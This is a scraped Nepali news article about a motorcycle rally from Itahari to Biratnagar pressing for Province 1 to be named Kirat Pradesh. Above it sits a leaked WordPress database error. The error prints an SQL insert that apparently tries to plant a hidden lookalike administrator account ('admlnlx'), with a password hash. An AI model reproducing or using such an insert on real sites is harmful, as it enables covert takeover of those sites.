WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVm7rxQ3aMx/PX0O5OCoM3biLfVBIq0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 14:28:40', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । किरात राई यायोक्खाको नेतृत्वमा विविन्न जातिय सस्थाहरुले प्रदेश १ को नाम किरात प्रदेश राख्न दबाब दिने उदेश्यले आज बृहत मोटरसाइकल र्यालीको आयोजना गरेको छ । र्याली इटहरीदेखि विराटनगरसम्मको २४ किलोमिटर दुरीमा हुनेछ ।
नेपाली कांग्रेस र एमाले किरात प्रदेश राख्न नमानिरहेको बेला ती दलहरुलाई शक्ति देखाउने उदेश्यले आयोजना गरिएको र्यालीमा अधिकतम पहिचान पक्षधरहरुलाई समेट्न यायोक्खाले प्रयास गरिरहेको छ ।
यायोक्खाका महासचिव जनक राईकाअनुसार बिहान ११ बजे इटहरीदेखि विराटनगरतर्फ र्याली सुरु गरिने छ । र्यालीले विराटनगरस्थित मुख्यमन्त्रीको कार्यालयमा पुगेर घेराउ गर्ने, मुख्यमन्त्री राजेन्द्र राईलाई ज्ञापनपत्र बुझाउने र बाहिर कोणसभा गर्नेछ ।
हाल नेकपा एमाले कोशी प्रदेश र कांग्रेस सप्तकोशी प्रदेश बनाउने पक्षमा छन् । अन्य दलहरु भने पहिचान जोडेर नामकरण गर्न तयार देखिएका छन् । प्रदेशको नाममा पहिचान जनित शब्द जोड्न पनि तयार नहुने कांग्रेस-एमालेका नेताहरुलाई दबाब दिनका लागि मोटरसाइकल र्याली गर्न लागेको हो ।